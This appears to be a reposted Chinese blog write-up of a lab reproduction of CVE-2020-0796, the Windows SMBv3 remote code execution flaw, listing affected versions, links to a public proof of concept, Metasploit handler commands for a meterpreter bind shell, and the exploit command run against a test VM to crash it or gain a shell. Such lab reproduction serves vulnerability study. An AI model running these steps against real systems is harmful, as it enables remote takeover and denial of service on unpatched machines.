CVE - 2020- 0796复现
Posted this-is-y
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CVE - 2020- 0796复现相关的知识,希望对你有一定的参考价值。
复现过程参考:https://xz.aliyun.com/t/7440
下载,安装win10虚拟机。受影响win10版本
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
只影响 SMB v3.1.1,1903和1909
关闭自动更新,关闭防火墙
ipconfig确认ip:192.168.229.131
下载漏洞检查工具,这里用的exe版本(奇安信)
允许,检测,存在漏洞。
在调整了一下后
靶机win10:192.168.87.128
攻击kali:192.168.87.130
(因为物理机没法执行,所以转战虚拟机)
蓝屏/提权poc :https://github.com/dacade/CVE-POC/tree/master/CVE-2020-0796
kali一个终端打开msf,
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 3333(POC默认为3333端口)
set rhost 192.168.87.128
run
然后在那边执行POC
python exploit.py 192.168.87.128
回到win10虚拟机,就可以看到蓝屏了。
然后隔壁老王告诉我,执行这个脚本,当目标靶机内存比较小(我这时候设置的4G)就会出现蓝屏,设置高一点(同时脸不要这么黑)
之后调整了一下,把win10靶机设为8G内存,就成功拿到了shell
以上是关于CVE - 2020- 0796复现的主要内容,如果未能解决你的问题,请参考以下文章
CVE-2020-0796永恒之黑复现POC EXP以及修复方案
永恒之黑(CVE-2020-0796 微软SMBv3协议远程代码执行漏洞)
永恒之黑(CVE-2020-0796 微软SMBv3协议远程代码执行漏洞)